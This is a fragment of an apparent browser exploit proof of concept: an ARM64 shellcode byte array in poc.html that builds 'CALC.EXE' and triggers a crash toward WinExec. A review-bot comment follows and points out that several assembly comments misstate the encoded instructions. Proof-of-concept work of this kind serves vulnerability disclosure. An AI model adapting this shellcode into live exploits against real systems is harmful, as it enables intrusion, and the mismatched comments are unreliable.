...

Code Block
title: poc.html
let shellcode = [

// Put CALC.EXE in x0
// AC
// movz x0, #0x4143
    0x60, 0x28, 0x88, 0xD2, 
// CL
// movk x0, #0x434c, lsl #16
    0x80, 0x69, 0xA8, 0xF2,
// E.
// movk x0, #0x452e, lsl #452e#32
    0xc0, 0xa5, 0xC8, 0xF2, 
// EX
// movk x0, #4558
#0x4558, lsl #48
    0x00, 0xab, 0xE8, 0xF2,

// put x0 on x9-stack
// str, x0, [x9], #8
    0x20, 0x85, 0x00, 0xF8,

// Put null into x0   
// movz, x0, #0
    0x00, 0x00, 0x80, 0xD2, 
// put x0 on x9-stack
// str x0, [x9], #8
    0x20, 0x85, 0x00, 0xF8, 

// put x9 into x0 - comment out to crash on winexec
// mov x0, x9
    0xe0, 0x03, 0x09, 0xaa,

// Subtract 16 from x0   (look at crash)
// sub, x0, 0x, #0x10
    0x00, 0x40, 0x00, 0xd1,

// Trigger crash
// ldr x11, [x10]
0x4b, 0x01, 0x40, 0xf9
];
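Review bot: Several of the assembly comments in the byte list do not match the instructions the bytes actually encode, which will mislead anyone reading the PoC: the third movk comment has `lsl #452e#32` where the bytes 0xc0, 0xa5, 0xC8, 0xF2 encode `movk x0, #0x452e, lsl #32`, the fourth is split across two lines as `#4558` / `#0x4558, lsl #48` and should be the single line `// movk x0, #0x4558, lsl #48`, and the `sub` comment reads `sub, x0, 0x, #0x10` where the bytes 0x00, 0x40, 0x00, 0xd1 encode `sub x0, x0, #0x10`. The stray commas in `// str, x0, [x9], #8` and `// movz, x0, #0` should also be dropped so the comments read as valid mnemonics. The final element `0x4b, 0x01, 0x40, 0xf9` is the only one not indented like the rest; that is cosmetic, but worth aligning while the comments are being fixed.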

...